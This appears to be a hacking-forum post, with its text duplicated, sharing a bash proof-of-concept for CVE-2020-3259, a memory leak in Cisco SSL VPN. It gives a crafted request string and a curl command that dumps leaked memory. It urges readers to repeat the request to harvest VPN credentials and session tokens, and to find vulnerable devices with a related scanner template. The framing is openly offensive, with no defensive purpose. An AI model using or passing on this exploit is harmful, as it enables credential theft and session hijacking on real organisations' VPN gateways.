Hey Community!
Didn't see any posts about this PoC, so I figured I'd share since it's still kicking around in 2024: Link
POC: POC Link
Cisco-CVE-2020-3259.sh
This bad boy's a Heartbleed-style vuln. Every time you fire off a request, you can snag a chunk of memory.
Do it enough times (with a bit of luck) and boom – you've got Cisco SSLVPN creds or login sessions.
Can't find any Nuclei or Nmap templates to scan for this thing, but here's a tip: check out the changelog for the fix. The versions are pretty close to the ones that patched CVE-2020-3580 (not exactly, but close enough).
So, you can hunt for vulnerable devices using the CVE-2020-3580 Nuclei template: Template
Didn't see any posts about this PoC, so I figured I'd share since it's still kicking around in 2024: Link
POC: POC Link
Cisco-CVE-2020-3259.sh
Bash:
ARGSTR='+CSCOE+/sdesktop/webstart.xml?tokeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeen=!@#$%^&%^&%^&%^&%^&%^&%^&%^%^&%^&%^&%^&%^%^&%^&%^&%^&test=%p'
echo $ARGSTR
curl -k https://1.2.3.4/$ARGSTR --trace-ascii output.txtThis bad boy's a Heartbleed-style vuln. Every time you fire off a request, you can snag a chunk of memory.
Do it enough times (with a bit of luck) and boom – you've got Cisco SSLVPN creds or login sessions.
Can't find any Nuclei or Nmap templates to scan for this thing, but here's a tip: check out the changelog for the fix. The versions are pretty close to the ones that patched CVE-2020-3580 (not exactly, but close enough).
So, you can hunt for vulnerable devices using the CVE-2020-3580 Nuclei template: Template
Последнее редактирование модератором:
